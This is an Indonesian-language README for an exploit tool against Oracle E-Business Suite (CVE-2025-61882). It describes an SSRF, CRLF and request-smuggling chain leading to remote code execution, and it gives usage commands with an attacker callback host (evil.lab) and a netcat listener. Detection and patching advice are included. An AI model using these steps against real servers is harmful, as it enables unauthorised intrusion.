## https://sploitus.com/exploit?id=D6BE3E6D-83D1-5B93-B9FA-A5D29193B757
```markdown
# CVE-2025-61882 โ Oracle E-Business Suite Remote Code Execution (Unauthenticated)
Eksploitasi **zero-click**, **pre-authentication** pada **Oracle E-Business Suite (EBS)** yang memanfaatkan kelemahan injeksi URL di komponen **Oracle Concurrent Processing / BI Publisher** untuk melakukan *Server-Side Request Forgery (SSRF)* yang digabungkan dengan *CRLF injection*, menghasilkan *HTTP request smuggling* dan akhirnya eksekusi kode jarak jauh (RCE) penuh.
---
## ๐ Detail Kerentanan
| Atribut | Nilai |
|--------------------------|-----------------------------------------------------------------------|
| **CVE ID** | CVE-2025-61882 |
| **CVSS v3.1** | 9.8 (Critical) |
| **Vektor Serangan** | Jaringan (AV:N) |
| **Kompleksitas** | Rendah (AC:L) |
| **Hak Istimewa** | Tanpa autentikasi (PR:N) |
| **Interaksi Pengguna** | Tidak diperlukan (UI:N) |
| **Dampak** | Kompromi total kerahasiaan, integritas, dan ketersediaan (C:H/I:H/A:H)|
| **Versi Terpengaruh** | Oracle EBS 12.2.3 โ 12.2.14 |
| **Tautan Resmi** | [Oracle Security Alert](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html) |
---
## ๐งฌ Arsitektur Serangan
1. **Pengambilan CSRF Token** โ Endpoint `/OA_HTML/JavaScriptServlet` menyediakan token anti-CSRF, tetapi endpoint target (UiServlet) tidak memvalidasi token secara benar, sehingga tahap ini hanya untuk menjaga konsistensi sesi.
2. **Injeksi `return_url`** โ Parameter `return_url` di dalam XML yang dikirimkan ke `/OA_HTML/configurator/UiServlet` tidak divalidasi terhadap daftar putih (whitelist), sehingga penyerang dapat menyuntikkan URL internal (SSRF) yang mengarah ke layanan Oracle Configuration Server di `localhost:7201`.
3. **CRLF Injection di `return_url`** โ Karena komponen tidak menyaring karakter *line feed* yang di-encode sebagai entitas HTML (` `), penyerang dapat menyelundupkan header HTTP baru setelah nilai `return_url`. Hal ini memungkinkan **HTTP request smuggling** di tingkat layanan internal.
4. **Pemanggilan Servlet Berbahaya** โ Payload yang diselundupkan adalah permintaan POST ke `/OA_HTML/help/../ieshostedsurvey.jsp`, yang diyakini mengandung kerentanan *deserialization* atau *code injection* yang dapat langsung menjalankan perintah OS dengan hak akses *oracle*.
---
## ๐ฆ Kebutuhan Sistem
- Python 3.8 atau lebih tinggi
- Pustaka: `requests`, `urllib3`
---
## โ๏ธ Instalasi
```bash
git clone https://github.com//CVE-2025-61882-OracleEBS-RCE.git
cd CVE-2025-61882-OracleEBS-RCE
pip install -r requirements.txt
```
**Catatan**: Lingkungan Python yang bersih (virtualenv) sangat disarankan.
---
## ๐ Penggunaan
```bash
python3 exploit.py
```
### Argumen Posisi
| Argumen | Keterangan |
|---------------------|----------------------------------------------------------------------------|
| `target_base_url` | URL lengkap aplikasi Oracle EBS, contoh: `http://192.168.1.100:8000` |
| `evil_server_host:port` | Alamat server penyerang yang akan menerima koneksi balik (misal: `10.10.14.99:80`) |
### Opsi Tambahan
| Opsi | Deskripsi |
|------------|--------------------------------------------------------|
| `--proxy` | Proksi HTTP (default: `None`), contoh: `--proxy http://127.0.0.1:8080` untuk debugging Burp Suite |
### Contoh Eksekusi
```bash
# Tanpa proxy
python3 exploit.py http://target-oracle-app.com:8000/ evil.lab:80
# Dengan proxy Burp Suite
python3 exploit.py http://target-oracle-app.com:8000/ evil.lab:80 --proxy http://127.0.0.1:8080
```
Setelah skrip berhasil mengirim payload, **konfigurasikan server jahat** Anda untuk menangkap koneksi masuk (misal: `nc -lvnp 80`) dan bersiap menerima callback dari target yang rentan.
---
## ๐งช Verifikasi Keberhasilan
1. Pada server jahat, Anda akan melihat permintaan HTTP dari alamat IP Oracle EBS menuju endpoint `/OA_HTML/help/../ieshostedsurvey.jsp` yang menandakan SSRF berhasil.
2. Jika *payload post-exploitation* (tidak disertakan di PoC ini karena alasan keamanan) sudah diintegrasikan, sesi *shell* balik akan terbentuk.
---
## ๐ก๏ธ Deteksi & Mitigasi
### Deteksi
- **Log Akses Web**: Cari permintaan ke `/OA_HTML/configurator/UiServlet` dengan parameter `getUiType` yang mengandung entitas HTML seperti ` ` (CRLF).
- **Anomali Jaringan**: Pantau koneksi keluar dari server Oracle EBS menuju IP eksternal yang tidak lazim, terutama pada port 80/443.
### Mitigasi
- **Patch Segera**: Terapkan *Critical Patch Update* Oracle sesuai arahan di tautan resmi di atas.
- **Penguatan Aplikasi**: Blokir akses dari internet ke endpoint `/OA_HTML/configurator/UiServlet` menggunakan WAF atau aturan *reverse proxy*.
- **Segmentasi Jaringan**: Pastikan server Oracle EBS tidak memiliki akses langsung ke jaringan eksternal yang tidak perlu.
---
## ๐ Penafian
Kode ini dirilis hanya untuk **keperluan pendidikan, penelitian keamanan, dan pengujian penetrasi yang sah dengan izin tertulis**. Penggunaan di luar skenario tersebut melanggar hukum dan sepenuhnya tanggung jawab pengguna. Penulis tidak bertanggung jawab atas penyalahgunaan.
---
## ๐ Referensi
- [Oracle Security Alert CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)
- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)
- [CWE-93: CRLF Injection](https://cwe.mitre.org/data/definitions/93.html)
---
## ๐ Lisensi
Proyek ini dilisensikan di bawah **MIT License** โ lihat file [LICENSE](LICENSE) untuk detail lebih lanjut.
```